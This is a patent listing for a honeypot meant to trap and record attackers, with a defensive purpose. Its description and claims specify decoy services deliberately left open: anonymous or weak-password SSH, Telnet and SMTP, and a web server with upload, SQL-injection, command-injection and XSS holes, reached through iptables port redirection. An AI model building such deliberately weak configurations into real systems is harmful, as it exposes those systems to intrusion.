CN114070630A - Viscous honeypot system and interaction method thereof - Google Patents
Viscous honeypot system and interaction method thereof Download PDFInfo
- Publication number
- CN114070630A CN114070630A CN202111365005.0A CN202111365005A CN114070630A CN 114070630 A CN114070630 A CN 114070630A CN 202111365005 A CN202111365005 A CN 202111365005A CN 114070630 A CN114070630 A CN 114070630A
- Authority
- CN
- China
- Prior art keywords
- module
- honeypot
- environment
- data
- service
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Pending
Links
- 238000000034 method Methods 0.000 title claims abstract description 15
- 230000003993 interaction Effects 0.000 title abstract description 6
- 238000007726 management method Methods 0.000 claims description 26
- 239000000523 sample Substances 0.000 claims description 23
- 238000013500 data storage Methods 0.000 claims description 15
- 238000012544 monitoring process Methods 0.000 claims description 14
- 239000003795 chemical substances by application Substances 0.000 claims description 7
- 230000000903 blocking effect Effects 0.000 claims description 6
- 238000001914 filtration Methods 0.000 claims description 6
- 238000002347 injection Methods 0.000 claims description 6
- 239000007924 injection Substances 0.000 claims description 6
- 230000035515 penetration Effects 0.000 claims description 6
- 230000007474 system interaction Effects 0.000 claims description 3
- 238000010586 diagram Methods 0.000 description 9
- 238000004590 computer program Methods 0.000 description 7
- 238000005516 engineering process Methods 0.000 description 5
- 238000003860 storage Methods 0.000 description 5
- 230000006870 function Effects 0.000 description 4
- 230000036626 alertness Effects 0.000 description 3
- 239000000243 solution Substances 0.000 description 3
- 238000009826 distribution Methods 0.000 description 2
- 230000003287 optical effect Effects 0.000 description 2
- 239000012466 permeate Substances 0.000 description 2
- 230000008569 process Effects 0.000 description 2
- 230000004083 survival effect Effects 0.000 description 2
- 230000035899 viability Effects 0.000 description 2
- 230000002159 abnormal effect Effects 0.000 description 1
- 239000008186 active pharmaceutical agent Substances 0.000 description 1
- 230000009286 beneficial effect Effects 0.000 description 1
- 238000007405 data analysis Methods 0.000 description 1
- 238000004519 manufacturing process Methods 0.000 description 1
- 238000012986 modification Methods 0.000 description 1
- 230000004048 modification Effects 0.000 description 1
- 238000005457 optimization Methods 0.000 description 1
- 238000003672 processing method Methods 0.000 description 1
- 238000006467 substitution reaction Methods 0.000 description 1
Images
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
- H04L63/1491—Countermeasures against malicious traffic using deception as countermeasure, e.g. honeypots, honeynets, decoys or entrapment
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/55—Detecting local intrusion or implementing counter-measures
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/57—Certifying or maintaining trusted computer platforms, e.g. secure boots or power-downs, version controls, system software checks, secure updates or assessing vulnerabilities
- G06F21/577—Assessing vulnerabilities and evaluating computer system security
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F9/00—Arrangements for program control, e.g. control units
- G06F9/06—Arrangements for program control, e.g. control units using stored programs, i.e. using an internal store of processing equipment to receive or retain programs
- G06F9/46—Multiprogramming arrangements
- G06F9/50—Allocation of resources, e.g. of the central processing unit [CPU]
- G06F9/5083—Techniques for rebalancing the load in a distributed system
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/02—Network architectures or network communication protocols for network security for separating internal from external traffic, e.g. firewalls
- H04L63/0281—Proxies
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
- H04L63/1416—Event detection, e.g. attack signature detection
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1433—Vulnerability analysis
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
- H04L63/1466—Active attacks involving interception, injection, modification, spoofing of data unit addresses, e.g. hijacking, packet injection or TCP sequence number attacks
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L2463/00—Additional details relating to network architectures or network communication protocols for network security covered by H04L63/00
- H04L2463/144—Detection or countermeasures against botnets
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- General Engineering & Computer Science (AREA)
- Computer Hardware Design (AREA)
- Software Systems (AREA)
- Theoretical Computer Science (AREA)
- Computing Systems (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Physics & Mathematics (AREA)
- General Physics & Mathematics (AREA)
- Data Exchanges In Wide-Area Networks (AREA)
Abstract
The invention discloses a sticky honeypot system and an interaction method thereof. A virtual environment system is built through the proxy ip, the honeypot system is monitored and managed, network connection is timely disconnected according to botnet risks, multi-task attack loads are balanced to different operation units, and downtime is avoided. The honeypot system and the interaction method thereof are optimized, and the operation efficiency and the self safety are improved.
Description
Technical Field
The invention relates to the field of network security, in particular to a viscous honeypot system and an interaction method thereof.
Background
Honeypot technology is a technology that spoofs internet attackers. It can be generally considered that honeypots are an unmanned, but closely monitored network host, which contains false high-value resources and some vulnerabilities to attract intruders to attack honeypot hosts for the purpose of protecting real hosts. Meanwhile, the honeypot can record all instructions of hackers for attacking, and accordingly a means for defending against the attack is established for the real host to use. By adopting the honeypot technology, unknown attacks can be resisted to a certain extent, and the protection capability of an actual system is enhanced.
The existing honeypot technology has the following problems:
1. most of the honeypots are low-interaction data analysis technologies, so that the honeypots cannot effectively record hacker attack means;
2. after entering the honeypot through a security hole which is arranged in the honeypot system in advance, a hacker does not have a corresponding data alarm and processing method, so that the honeypot system is utilized by the hacker to become a botnet;
3. the honeypot system is simple to enter, the alertness of hackers is increased, and the cheating is failed;
4. when the honeypot system is attacked by a plurality of hackers at the same time, the downtime phenomenon is easy to generate.
Disclosure of Invention
Aiming at the problems, the invention provides a viscous honeypot system and an interaction method thereof, and solves the problems of optimization, high efficiency and safety of the honeypot system.
The invention is realized by the following technical scheme:
a sticky honeypot system comprises an agent ip module, a proxy module and a virtual machine module, wherein the agent ip module is used for distributing an agent ip address to a virtual machine to construct a new virtual environment; the virtual environment module is used for building a system environment mirror image according to the proxy ip address to simulate a real service system environment; the environment vulnerability module is used for building an intranet asset framework and a Web service framework with a vulnerability in the system environment; the data recording module is used for recording operation records during penetration of attackers, and the operation records comprise used ip addresses, attack duration and sensitive operation commands; the data storage module is used for storing the operation record of an attacker; the honeypot management module is used for monitoring the system environment and analyzing, processing and displaying the monitoring data; the emergency processing module is used for blocking the intrusion of the botnet; the load balancing module is used for balancing the load of each service task; the agent ip module is connected with the virtual environment module, the virtual environment module is connected with the environment loophole module, the environment loophole module is connected with the data recording module, the data recording module is connected with the data storage module, the data storage module is connected with the honeypot management module, and the honeypot management module is respectively connected with the emergency processing module and the load balancing module.
The invention firstly constructs a virtual environment through proxy ip address, builds a system environment mirror image to simulate a real service system environment, such as Linux, window or other system environments, avoids the exposure of trapping, is closer to a direct real environment system, improves the difficult program for hackers to enter a honeypot system, reduces the vigilance of hackers attack, and simultaneously strives for more operation time for locking attackers; in addition, a honeypot management module and an emergency processing module are arranged on the honeypot system, so that the honeypot system can be monitored and alarmed in real time, safety measures such as network connection interruption are taken in real time according to the monitoring condition, and the risk that the honeypot system is utilized by hackers to become botnet is reduced; and finally, a load balancing module is arranged to perform balanced distribution on the task load when multiple simultaneous attacks are received, so that system downtime caused by over-heavy network load is avoided, and the viability of the honeypot system is improved.
Further, the proxy ip module comprises a proxy ip pool constructed by the cloud platform.
Further, the virtual environment module comprises a vmware virtual machine, a Docker container based on the vmware virtual machine, and a Debian system built in the Docker container.
Further, the intranet asset framework comprises a database, and an SSH service, a Telnet service and an SMTP service with weak password vulnerability; the Web service architecture comprises a Web server which has a file uploading vulnerability, an SQL injection vulnerability, a command injection vulnerability and a cross-site scripting vulnerability and is built in the Debian.
Further, the data recording module comprises a Web server log, a system log and a network probe, the network probe comprises an external network probe and an internal network probe, the external network probe is used for capturing a data packet of the Web server, filtering and recording the data packet, the internal network probe is used for capturing internal network data flow, filtering and recording the internal network data flow, and the network probe sends recorded data to the data storage module.
Further, the data storage module comprises a MySQL database, and the MySQL database is isolated from a database in the intranet asset framework and is located in different network segments.
Further, the honeypot Management module comprises a Management Console platform, and the Management Console platform manages the data collected by the honeypot through the MySQL database and monitors and alarms the state of the system environment in real time.
Further, the emergency processing module comprises a TTL monitor and a network termination switch, the TTL monitor is used to monitor a low lifetime, and the network termination switch is used to interrupt or disconnect a network connection according to the TTL monitor. Analyzing possible botnet intrusion in the honeypot system by combining the situation that TTL is abnormally low and the data flow intercepted by the network probe; the network termination switch is used for disconnecting and interrupting unsafe network connection and protecting the honeypot from being utilized by an attacker to become a botnet.
Further, the load balancing module includes a DnsLoad Balance, and is configured to share loads of the intranet SSH service, the Telnet service, and the SMTP service to the plurality of operation units for operation. The honeypot downtime caused by the fact that an attacker permeates a plurality of services at the same time is avoided.
In another implementation manner of the present invention, a viscous honeypot system interaction method includes: distributing proxy ip addresses to virtual machines to construct a new virtual environment in a proxy ip form; building a system environment mirror image in the new virtual environment to simulate a real service system environment; establishing an intranet asset framework and a Web service framework with holes in the system environment; redirecting a port of a vulnerability framework in the honeypot system to a port of a real business environment from iptables; recording and storing operation records during penetration of attackers, wherein the operation records comprise used ip addresses, attack duration and sensitive operation commands; meanwhile, the system environment is monitored, and monitoring data are analyzed, processed and displayed; and balancing the load of each service task according to the real-time condition of the system environment, and blocking the intrusion of the botnet.
Compared with the prior art, the invention has the following advantages and beneficial effects:
an ip is randomly provided for the vmware virtual machine through the proxy ip pool, a new virtual machine is generated by using a new ip address, a virtual environment with a leak is simulated, the difficulty degree of a hacker entering a honeypot system is improved, the hacker attack alertness is reduced, meanwhile, the processing of attack events by security personnel is increased, and the time of the attacker is locked; managing and analyzing a database for storing hacker attack data through a Management Console platform, monitoring the state of the honeypot in real time, and giving an alarm to abnormal data; through the use of the TTL monitor and the network termination switch, the safety of the honeypot system is monitored, and the risk that the honeypot system is utilized by hackers to become a botnet is reduced; by deploying Dnsload Balance in the honeypot system, the network load caused by a plurality of hackers attacking the honeypot system simultaneously is reduced, the viscosity of the honeypot system is enhanced, and the survival capacity of the honeypot system is improved.
Drawings
In order to more clearly illustrate the technical solutions of the exemplary embodiments of the present invention, the drawings that are required to be used in the embodiments will be briefly described below, it should be understood that the following drawings only illustrate some embodiments of the present invention and therefore should not be considered as limiting the scope, and that for those skilled in the art, other related drawings can be obtained from these drawings without inventive effort. In the drawings:
FIG. 1 is a schematic diagram of a framework of a honeypot system according to example 1;
Detailed Description
In order to make the objects, technical solutions and advantages of the present invention more apparent, the present invention is further described in detail below with reference to examples and accompanying drawings, and the exemplary embodiments and descriptions thereof are only used for explaining the present invention and are not meant to limit the present invention.
Example 1
A viscous honeypot system, as shown in fig. 1, includes the following modules:
the proxy ip module is used for distributing proxy ip addresses to the virtual machines to construct a new virtual environment; the proxy ip module mainly comprises a proxy ip pool constructed by a cloud platform.
The virtual environment module is used for building a system environment mirror image according to the proxy ip address to simulate a real service system environment; the virtual environment module comprises a vmware virtual machine, a Docker container based on the vmware virtual machine and a Debian system built in the Docker container.
The system comprises an environment vulnerability module, a network vulnerability module and a Web service module, wherein the environment vulnerability module is used for building an intranet asset framework and a Web service framework with vulnerabilities in a system environment; the intranet asset framework comprises a database, SSH service with weak password vulnerability, Telnet service and SMTP service; the Web service architecture comprises a Web server which has a file uploading vulnerability, an SQL injection vulnerability, a command injection vulnerability and a cross-site scripting vulnerability and is built in the Debian.
The data recording module is used for recording operation records during penetration of attackers, and the operation records comprise used ip addresses, attack duration and sensitive operation commands; the data recording module comprises a Web server log, a system log and a network probe, the network probe comprises an outer network probe and an inner network probe, the outer network probe is used for capturing a data packet of the Web server, filtering and recording the data packet, the inner network probe is used for capturing inner network data flow, filtering and recording the inner network data flow, and the network probe sends recorded data to the data storage module.
The data storage module is used for storing the operation record of an attacker; the data storage module comprises a MySQL database, and the MySQL database is isolated from the database in the intranet asset framework and is positioned in different network segments.
The honeypot management module is used for monitoring the system environment and analyzing, processing and displaying the monitoring data; the honeypot Management module comprises a Management Console platform, the Management Console platform manages data collected by honeypots through a MySQL database, and meanwhile, the honeypot Management module monitors and alarms in real time on the state of the system environment.
The emergency processing module is used for blocking the intrusion of the botnet; the emergency processing module comprises a TTL monitor and a network termination switch, wherein the TTL monitor is used for monitoring the low survival time, and the network termination switch is used for interrupting or disconnecting the network connection according to the condition of the TTL monitor. Analyzing possible botnet intrusion in the honeypot system by combining the situation that TTL is abnormally low and the data flow intercepted by the network probe; the network termination switch is used for disconnecting and interrupting unsafe network connection and protecting the honeypot from being utilized by an attacker to become a botnet.
The load balancing module is used for balancing the load of each service task; the load balancing module comprises Dnsload Balance and is used for distributing the load of the SSH service, the Telnet service and the SMTP service of the intranet to the plurality of operation units for operation. The honeypot downtime caused by the fact that an attacker permeates a plurality of services at the same time is avoided.
In the physical structure of this embodiment 1, the electrical signal connection relationship among the modules specifically includes: the agent ip module is connected with the virtual environment module, the virtual environment module is connected with the environment loophole module, the environment loophole module is connected with the data recording module, the data recording module is connected with the data storage module, the data storage module is connected with the honeypot management module, and the honeypot management module is respectively connected with the emergency processing module and the load balancing module.
In the embodiment 1, a virtual environment is constructed by an agent ip address, a system environment mirror image is constructed to simulate a real service system environment, such as Linux, window or other system environments, exposure of trapping is avoided, so that the system is closer to a direct real environment system, a difficult program for a hacker to enter a honeypot system is improved, the hacker attack alertness is reduced, and more operation time is strived for a locking attacker; in addition, a honeypot management module and an emergency processing module are arranged on the honeypot system, so that the honeypot system can be monitored and alarmed in real time, safety measures such as network connection interruption are taken in real time according to the monitoring condition, and the risk that the honeypot system is utilized by hackers to become botnet is reduced; and finally, a load balancing module is arranged to perform balanced distribution on the task load when multiple simultaneous attacks are received, so that system downtime caused by over-heavy network load is avoided, and the viability of the honeypot system is improved.
Example 2
The embodiment 2 is a sticky honeypot system interaction method based on the embodiment 1, and includes:
1) distributing proxy ip addresses to virtual machines to construct a new virtual environment in a proxy ip form;
2) building a system environment mirror image in a new virtual environment to simulate a real service system environment;
3) establishing an intranet asset framework and a Web service framework with holes in a system environment;
4) redirecting a port of a vulnerability framework in the honeypot system to a port of a real business environment from iptables;
5) recording and storing operation records during penetration of attackers, wherein the operation records comprise used ip addresses, attack duration and sensitive operation commands;
6) meanwhile, the system environment is monitored, and monitoring data are analyzed, processed and displayed;
7) and balancing the load of each service task according to the real-time condition of the system environment, and blocking the intrusion of the botnet.
Example 3
In this embodiment 3, on the basis of embodiment 1, the honeypot system in embodiment 1 is deployed in a real service environment, a virtual environment module uses an ip address provided by a proxy ip module, a virtual machine is newly built in the real environment, and a Docker container is used in the virtual machine to complete deployment of the virtual service environment, because the Docker container has a faster start time, is good at handling the server use pressure of centralized outbreak, and is elastically stretchable and quickly expandable, the honeypot system is suitable for building a virtual service environment, and a mirror image of Debian is built in the Docker container, where the Debian is an open source system with Linux as a kernel, has stronger stability and faster and easier memory management and security protection compared with other Linux systems, building the honeypot system is completed by Debian ambient vulnerability module, and SSH services, Telnet services, and SMTP services in an intranet asset framework are opened to anonymous login and weak password is provided, then, the service in the real environment is limited by iptables, for example, the SSH service port is changed from 22 to 62222, the port number monitored in the honeypot system is redirected to 22, 23 and 25 ports by iptables, when a hacker attacks the intranet service, the hacker directly enters the virtual environment of the honeypot system and sends the operation data to the MySQL database by the intranet probe and the system log, when the hacker attacks the real Web site, the hacker is also directed to the virtual Web service architecture by the port redirection, when the hacker attacks the Web service architecture by common Web loopholes, the extranet probe and the Web server log send the data to the MySQL database, the Management module in the honeypot system can analyze, process, display and alarm in real time the attack data stored in the MySQL database by using a Management module, in order to prevent the honeypot system from becoming a dead network, through setting up in the TTL monitor that honeypot system was controlled by honeypot Management module, report an emergency and ask for help or increased vigilance in real time and in time break off dangerous connection through network termination switch to the connection that TTL is unusual low, guarantee honeypot system again and prevent honeypot system become the risk of zombie network when protecting and studying the hacking, add DnsLoadBance and control by honeypot Management module in honeypot system to prevent intranet SSH service, the network pressure that Telnet service and SMTP service appear, wherein, embodiment 1Management Console platform is through different API interface connection TTL monitor, network termination switch and DnsLoadBance.
As will be appreciated by one skilled in the art, embodiments of the present application may be provided as a method, system, or computer program product. Accordingly, the present application may take the form of an entirely hardware embodiment, an entirely software embodiment or an embodiment combining software and hardware aspects. Furthermore, the present application may take the form of a computer program product embodied on one or more computer-usable storage media (including, but not limited to, disk storage, CD-ROM, optical storage, and the like) having computer-usable program code embodied therein.
The present application is described with reference to flowchart illustrations and/or block diagrams of methods, apparatus (systems), and computer program products according to embodiments of the application. It will be understood that each flow and/or block of the flow diagrams and/or block diagrams, and combinations of flows and/or blocks in the flow diagrams and/or block diagrams, can be implemented by computer program instructions. These computer program instructions may be provided to a processor of a general purpose computer, special purpose computer, embedded processor, or other programmable data processing apparatus to produce a machine, such that the instructions, which execute via the processor of the computer or other programmable data processing apparatus, create means for implementing the functions specified in the flowchart flow or flows and/or block diagram block or blocks.
These computer program instructions may also be stored in a computer-readable memory that can direct a computer or other programmable data processing apparatus to function in a particular manner, such that the instructions stored in the computer-readable memory produce an article of manufacture including instruction means which implement the function specified in the flowchart flow or flows and/or block diagram block or blocks.
These computer program instructions may also be loaded onto a computer or other programmable data processing apparatus to cause a series of operational steps to be performed on the computer or other programmable apparatus to produce a computer implemented process such that the instructions which execute on the computer or other programmable apparatus provide steps for implementing the functions specified in the flowchart flow or flows and/or block diagram block or blocks.
It will be understood by those skilled in the art that all or part of the steps of the above facts and methods can be implemented by hardware related to instructions of a program, and the related program or the program can be stored in a computer readable storage medium, and when executed, the program includes the following steps: corresponding method steps are introduced here, and the storage medium may be a ROM/RAM, a magnetic disk, an optical disk, etc.
The above-mentioned embodiments are intended to illustrate the objects, technical solutions and advantages of the present invention in further detail, and it should be understood that the above-mentioned embodiments are merely exemplary embodiments of the present invention, and are not intended to limit the scope of the present invention, and any modifications, equivalent substitutions, improvements and the like made within the spirit and principle of the present invention should be included in the scope of the present invention.
Claims (10)
1. A viscous honeypot system is characterized in that,
the proxy ip module is used for distributing proxy ip addresses to the virtual machines to construct a new virtual environment;
the virtual environment module is used for building a system environment mirror image according to the proxy ip address to simulate a real service system environment;
the environment vulnerability module is used for building an intranet asset framework and a Web service framework with a vulnerability in the system environment;
the data recording module is used for recording operation records during penetration of attackers, and the operation records comprise used ip addresses, attack duration and sensitive operation commands;
the data storage module is used for storing the operation record of an attacker;
the honeypot management module is used for monitoring the system environment and analyzing, processing and displaying the monitoring data;
the emergency processing module is used for blocking the intrusion of the botnet;
the load balancing module is used for balancing the load of each service task;
the agent ip module is connected with the virtual environment module, the virtual environment module is connected with the environment loophole module, the environment loophole module is connected with the data recording module, the data recording module is connected with the data storage module, the data storage module is connected with the honeypot management module, and the honeypot management module is respectively connected with the emergency processing module and the load balancing module.
2. The sticky honeypot system of claim 1 wherein the proxy ip module comprises a pool of proxy ip built from a cloud platform.
3. The viscous honeypot system of claim 1 wherein the virtual environment modules comprise vmware virtual machines, a Docker container based on vmware virtual machines, and a Debian system built in the Docker container.
4. The sticky honeypot system of claim 1 wherein the intranet asset framework comprises a database and SSH services, Telnet services, and SMTP services with weak password vulnerabilities; the Web service architecture comprises a Web server which has a file uploading vulnerability, an SQL injection vulnerability, a command injection vulnerability and a cross-site scripting vulnerability and is built in the Debian.
5. The viscous honeypot system of claim 1 wherein the data logging module comprises a Web server log, a system log and a network probe, the network probe comprises an extranet probe for capturing data packets of the Web server and filtering and recording the data packets, and an intranet probe for capturing intranet data traffic and filtering and recording the intranet data traffic, and the network probe sends all recorded data to the data storage module.
6. The viscous honeypot system of claim 1 wherein the data storage module comprises a MySQL database that is isolated from a database in an intranet asset framework and located in a different network segment.
7. The viscous honeypot system of claim 1 wherein the honeypot Management module comprises a Management consolle platform that manages data collected by honeypots via MySQL database while monitoring and real-time alerting of the state of the system environment.
8. The viscous honeypot system of claim 1 wherein the emergency processing module includes a TTL monitor configured to monitor low time to live and a network termination switch configured to interrupt or disconnect a network connection based on a condition of the TTL monitor.
9. The viscous honeypot system of claim 1 wherein the load balancing module comprises a Dnsload Balance to distribute the load of the Intranet SSH service, the Telnet service, and the SMTP service across multiple operational units for execution.
10. A sticky honeypot system interaction method is characterized by comprising the following steps:
distributing proxy ip addresses to virtual machines to construct a new virtual environment in a proxy ip form;
building a system environment mirror image in the new virtual environment to simulate a real service system environment;
establishing an intranet asset framework and a Web service framework with holes in the system environment;
redirecting a port of a vulnerability framework in the honeypot system to a port of a real business environment from iptables;
recording and storing operation records during penetration of attackers, wherein the operation records comprise used ip addresses, attack duration and sensitive operation commands;
meanwhile, the system environment is monitored, and monitoring data are analyzed, processed and displayed;
and balancing the load of each service task according to the real-time condition of the system environment, and blocking the intrusion of the botnet.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202111365005.0A CN114070630A (en) | 2021-11-17 | 2021-11-17 | Viscous honeypot system and interaction method thereof |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202111365005.0A CN114070630A (en) | 2021-11-17 | 2021-11-17 | Viscous honeypot system and interaction method thereof |
Publications (1)
| Publication Number | Publication Date |
|---|---|
| CN114070630A true CN114070630A (en) | 2022-02-18 |
Family
ID=80277993
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN202111365005.0A Pending CN114070630A (en) | 2021-11-17 | 2021-11-17 | Viscous honeypot system and interaction method thereof |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN114070630A (en) |
Cited By (3)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN115001875A (en) * | 2022-08-05 | 2022-09-02 | 上海斗象信息科技有限公司 | Honeypot-based network trapping method, device, server and storage medium |
| CN115174218A (en) * | 2022-07-04 | 2022-10-11 | 云南电网有限责任公司 | Method for carrying out power grid safety protection based on high-simulation virtual honeypot technology |
| CN116318824A (en) * | 2023-01-09 | 2023-06-23 | 广州云峰信息科技有限公司 | Web attack trapping system |
Citations (7)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN103139184A (en) * | 2011-12-02 | 2013-06-05 | 中国电信股份有限公司 | Intelligent network firewall device and network attack protection method |
| CN104978519A (en) * | 2014-10-31 | 2015-10-14 | 哈尔滨安天科技股份有限公司 | Implementation method and device of application-type honeypot |
| CN106789865A (en) * | 2016-07-14 | 2017-05-31 | 深圳市永达电子信息股份有限公司 | A kind of network safety protection method based on GRE network integration SDN technologies and Honeypot Techniques |
| US20170331858A1 (en) * | 2016-05-10 | 2017-11-16 | Quadrant Information Security | Method, system, and apparatus to identify and study advanced threat tactics, techniques and procedures |
| CN111083117A (en) * | 2019-11-22 | 2020-04-28 | 上海交通大学 | Botnet tracking and tracing system based on honeypots |
| CN111641620A (en) * | 2020-05-21 | 2020-09-08 | 黄筱俊 | Novel cloud honeypot method and framework for detecting evolution DDoS attack |
| CN113364750A (en) * | 2021-05-26 | 2021-09-07 | 浙江工业大学 | Method for inducing APT attack to introduce honeypots based on Snort and OpenFlow heuristic method |
-
2021
- 2021-11-17 CN CN202111365005.0A patent/CN114070630A/en active Pending
Patent Citations (7)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN103139184A (en) * | 2011-12-02 | 2013-06-05 | 中国电信股份有限公司 | Intelligent network firewall device and network attack protection method |
| CN104978519A (en) * | 2014-10-31 | 2015-10-14 | 哈尔滨安天科技股份有限公司 | Implementation method and device of application-type honeypot |
| US20170331858A1 (en) * | 2016-05-10 | 2017-11-16 | Quadrant Information Security | Method, system, and apparatus to identify and study advanced threat tactics, techniques and procedures |
| CN106789865A (en) * | 2016-07-14 | 2017-05-31 | 深圳市永达电子信息股份有限公司 | A kind of network safety protection method based on GRE network integration SDN technologies and Honeypot Techniques |
| CN111083117A (en) * | 2019-11-22 | 2020-04-28 | 上海交通大学 | Botnet tracking and tracing system based on honeypots |
| CN111641620A (en) * | 2020-05-21 | 2020-09-08 | 黄筱俊 | Novel cloud honeypot method and framework for detecting evolution DDoS attack |
| CN113364750A (en) * | 2021-05-26 | 2021-09-07 | 浙江工业大学 | Method for inducing APT attack to introduce honeypots based on Snort and OpenFlow heuristic method |
Cited By (4)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN115174218A (en) * | 2022-07-04 | 2022-10-11 | 云南电网有限责任公司 | Method for carrying out power grid safety protection based on high-simulation virtual honeypot technology |
| CN115174218B (en) * | 2022-07-04 | 2024-04-09 | 云南电网有限责任公司 | Method for carrying out power grid safety protection based on high-simulation virtual honeypot technology |
| CN115001875A (en) * | 2022-08-05 | 2022-09-02 | 上海斗象信息科技有限公司 | Honeypot-based network trapping method, device, server and storage medium |
| CN116318824A (en) * | 2023-01-09 | 2023-06-23 | 广州云峰信息科技有限公司 | Web attack trapping system |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| Moustafa et al. | Federated TON_IoT Windows datasets for evaluating AI-based security applications | |
| CN114070630A (en) | Viscous honeypot system and interaction method thereof | |
| EP3414663A1 (en) | Automated honeypot provisioning system | |
| KR101534194B1 (en) | cybersecurity practical training system and method that reflects the intruder behavior patterns | |
| Mukhopadhyay et al. | A comparative study of related technologies of intrusion detection & prevention systems | |
| CN110401638B (en) | Network traffic analysis method and device | |
| CN113422779B (en) | Active security defense system based on centralized management and control | |
| KR20110068308A (en) | System and method for network attack detection and analysis | |
| CN105227559A (en) | The information security management framework that a kind of automatic detection HTTP actively attacks | |
| Singh et al. | Testbed-based evaluation of siem tool for cyber kill chain model in power grid scada system | |
| CN114006722B (en) | Situation awareness verification method, device and system for detecting threat | |
| Borisaniya et al. | Incorporating honeypot for intrusion detection in cloud infrastructure | |
| Zhang et al. | Unveiling malicious activities in lan with honeypot | |
| Abe et al. | Cyber threat information sharing system for industrial control system (ICS) | |
| Çalışkan et al. | Benefits of the virtualization technologies with intrusion detection and prevention systems | |
| Vokorokos et al. | Sophisticated honeypot mechanism-the autonomous hybrid solution for enhancing computer system security | |
| Zeinali | Analysis of security information and event management (SIEM) evasion and detection methods | |
| CN115549950A (en) | Safety protection system of industrial control equipment based on virtualization | |
| Bendiab et al. | IoT Security Frameworks and Countermeasures | |
| Ivanova | Modelling the impact of cyber attacks on the traffic control centre of an urban automobile transport system by means of enhanced cybersecurity | |
| Fuzi et al. | Integrated network monitoring using zabbix with push notification via telegram | |
| Ghosh et al. | An alternative model of virtualization based intrusion detection system in cloud computing | |
| Mayorga et al. | Honeypot network configuration through cyberattack patterns | |
| Bari | Protecting an enterprise network through the deployment of honey pot | |
| CN113609483B (en) | Method, device, equipment and readable medium for processing server virus |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination |